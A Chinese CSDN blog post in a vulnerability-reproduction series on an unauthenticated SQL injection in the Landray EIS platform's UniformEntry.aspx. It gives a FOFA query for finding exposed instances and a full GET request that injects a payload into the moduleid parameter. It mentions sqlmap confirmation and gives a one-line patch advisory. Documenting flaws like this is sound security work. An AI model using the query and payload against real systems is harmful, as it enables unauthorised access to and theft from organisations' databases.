蓝凌EIS智慧协同平台 UniformEntry.aspx 存在 SQL注入漏洞

最新推荐文章于 2024-07-15 20:23:14 发布
最新推荐文章于 2024-07-15 20:23:14 发布
阅读量576 收藏 9
点赞数 11
分类专栏: 漏洞复现 文章标签: sql 数据库 网络 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/luochen2436/article/details/135504662
版权

产品简介

蓝凌EIS智慧协同平台是一款专为企业提供高效协同办公和团队合作的产品。该平台集成了各种协同工具和功能,旨在提升企业内部沟通、协作和信息共享的效率。

漏洞概述

由于蓝凌EIS智慧协同平台 UniformEntry.asp接口处未对用户输入的SQL语句进行过滤或验证导致出现SQL注入漏洞,未经身份验证的攻击者可以利用此漏洞获取数据库敏感信息。

指纹识别

fofa:

app="Landray-EIS智慧协同平台"

漏洞利用

poc:

GET /third/DingTalk/Pages/UniformEntry.aspx?moduleid=1%20and%201=@@version--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip

查询数据库版本
在这里插入图片描述
sqlmap验证
在这里插入图片描述

修复建议

联系软件厂商更新至最新安全版本

3tefanie丶zhou
关注
  • 11
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞复现】蓝凌EIS智慧协同平台-ShowUserInfo-sql注入
知黑而守白
01-11 241
蓝凌EIS智慧协同平台是个自动化办公OA,具有多端同步、无缝协作,提供移动端(蓝凌KK、阿里钉钉、微信企业号)、桌面端、网页端多端应用统一入口、跨屏操作、信息同步知识云服务集成、学习与创新应用、企业2.0应用、跨系统整合等优点,并且在诸多公司也采用该平台蓝凌EIS智慧协同平台ShowUserInfo接口存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
蓝凌协同管理平台功能列表.doc
09-24
蓝凌协同管理平台是一款强大的企业级管理工具,其功能涵盖了门户应用、标准应用模块等多个方面,旨在提升企业的协同效率和知识管理能力。 1. **门户应用**:蓝凌EIS V6.0提供了多种类型的门户,包括个人门户、工作...
蓝凌EIS智慧协同平台 frm_form_upload.aspx 文件上传漏洞复现
0xSec
01-12 851
蓝凌EIS智慧协同平台frm_form_upload.aspx接口处存在任意文件上传漏洞,未经过身份认证的攻击者可通过构造压缩文件上传恶意后门文件,远程命令执行,获取服务器权限。
蓝凌EIS智慧协同平台frm_form_upload.aspx接口存在任意文件上传漏洞
nnn2188185的博客
01-18 178
蓝凌EIS智慧协同平台frm_form_upload.aspx接口存在任意文件上传漏洞
蓝凌EIS智慧协同平台 fl_define_flow_chart_show sql注入漏洞
m0_50797689的博客
01-26 116
蓝凌EIS智慧协同平台 fl_define_flow_chart_show sql注入漏洞
蓝凌EIS智慧协同平台 fl_define_flow_chart_show.aspx 存在 SQL注入漏洞
3tefanie丶zhou的博客
01-10 482
蓝凌EIS智慧协同平台是一款专为企业提供高效协同办公和团队合作的产品。该平台集成了各种协同工具和功能,旨在提升企业内部沟通、协作和信息共享的效率。由于蓝凌EIS智慧协同平台 fl_define_flow_chart_show.aspx接口处未对用户输入的SQL语句进行过滤或验证导致出现SQL注入漏洞,未经身份验证的攻击者可以利用此漏洞获取数据库敏感信息。
蓝凌EIS智慧协同平台 UniformEntry.aspx sql注入漏洞
Keepb1ue的博客
01-09 562
蓝凌EIS智慧协同平台是一个简单、高效的工作方式专为成长型企业打造的沟通、协同、社交的移动办公平台,覆盖OA、沟通、客户、人事、知识等管理需求,集合了非常丰富的模块,满足组织企业在知识、项目管理系统建设等需求的一款OA系统。蓝凌EIS智慧协同平台UniformEntry.aspx文件代码存在SQL注入漏洞。攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。2.部署Web应用防火墙,对数据库操作进行监控。app=“Landray-EIS智慧协同平台”1.升级至系统最新版本。
蓝凌OA custom.jsp 任意文件读取漏洞批量扫描脚本.py
08-28
自己写的批量扫描脚本,很好用,可以借鉴一下
走向智慧财务——蓝凌智能化费用管控解决方案.zip
02-18
智慧财务解决方案是一种集成了最新技术和智能化工具的全面财务管理方案。它利用先进的数据分析技术,通过云计算和自动化处理等手段,实现了财务流程的高效化和精细化。这一方案不仅能够优化企业的财务管理流程,降低...
蓝凌知识管理赋能全员,打造基准方中智慧设计院.pdf
05-25
蓝凌知识管理赋能全员,打造基准方中智慧设计院.pdf
Mac M1安装配置Hadoop+Flink SQL环境
zhujiahui622的专栏
07-12 1008
Flink 1.18.1+ Hadoop 3.4.0
如何解决 PostgreSQL 中由于索引不当导致的性能下降问题?
技术笔记
07-12 743
比如说,有一个订单表,其中“订单日期”这个列经常被用于按时间范围查询订单,但却没有为其创建索引,这就会导致数据库在查询时需要遍历整个表,极大地降低了查询速度。命令,我们可以查看查询的执行计划。再举一个例子,如果我们发现某个表上存在多个类似的索引,比如“idx_age_1”和“idx_age_2”,并且它们的定义几乎相同,这时候就可以考虑删除其中一个冗余的索引,以减少维护成本和提高性能。然而,就像任何复杂的系统一样,它也可能会遇到性能方面的挑战,其中由于索引不当导致的性能下降问题是比较常见且令人头疼的。
SQL笔试题【数据岗】
房东的猫的博客
07-11 285
题目 4:输出一张 dws 表,查询过去任意日期的曝光活跃用户的 7 日留存率,输出字 段日 期,用户 id,7 日留存率具体表结构如下表 1 用户行为表:t_user_video_action_d l分区:ds(格式 yyyyMMdd) l主键:user_id、video_id l含义:一个用户对一个视频的所有行为聚合,每天增量 字段名字段含义类型。题目 3:计算每个用户每天第一次曝光视频的时间戳,运行速度越快越好,输出字段 日期, 用户 id,时间戳。
SQL Server设置定时作业调度Schedule
最新发布
Cachel Wood的博客
07-15 168
在“步骤”选项卡中,单击“新建”按钮,然后输入步骤的名称和描述。在“计划”选项卡中,单击“新建”按钮来创建一个新的计划。代理将在指定的时间和频率下运行作业,并执行您定义的。右键单击“作业”文件夹,然后选择“新建作业”。在“作业属性”对话框中,输入作业的名称和描述。代理的功能,可以用来设置定时作业。在“命令”文本框中,输入要定期执行的。现在,您已经成功设置了一个定时作业。连接到要设置定时作业的数据库实例。设置每天早上八点执行这个定时任务。在对象资源管理器中,展开“
SQL面试题-留存率计算
xiao4816的博客
07-07 404
计算的是整段时间范围内,每一天为基准的所有的留存1、2、7天的用户数。计算的是用户首次登陆时间为基准时间,计算该基准时间之后的n日留存率。方法一的优势是可以一次性计算出,每天的不同时间范围的留存率。缺点:如果要计算n天留存需要增加代码量。但是不是很直观,并且计算量比较大。优点:代码直观好理解。
SQL Server详细使用教程(包含启动SQL server服务、建立数据库、建表的详细操作) 非常适合初学者
hackeroink的博客
07-15 497
本文主要详细介绍SQL server2019的简单使用,以《数据库系统概论(第5版)》的第79页—第80页为例,详细介绍如何使用SQL server2019这款数据库软件,包括启动SQL server服务,建立数据库(学生—课程模式S-T),建立课程表等,内容比较简单,容易理解,适合广大初学者了解SQL server的简单使用。不会涉及到复杂的语法知识,如果有也会详细解释的!下文标红的字请重点关注一下!本文的需要建表的数据如下:2.Course课程号Cno课程名Cname先行课Cpno学分。
sqlmap使用之-post注入、head注入(ua、cookie、referer)
weixin_51520483的博客
07-11 208
bp抓包获取post数据将数据保存到post.txt文件加上-r指定数据文件。
NoSQL之Redis配置与优化
henanchenxuyuan的博客
07-11 1251
Redis(RemoteDictionaryServer,远程字典型)是一个开源的、使用C语言编写的NoSQL数据库。Redis 基于内存运行并支持持久化,采用 key-value(键值对)的存储形式是目前分布式架构中不可或缺的一环。Redis服务器程序是单进程模型,也就是在一台服务器上可以同时启动多个Redis 进程,而 Redis 的实际处理速度则是完全依靠于主进程的执行效率。若在服务器上只运行一个Redis 进程,当多个客户端同时访问时,服务器的处理能力是会有一定程度的下降;

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值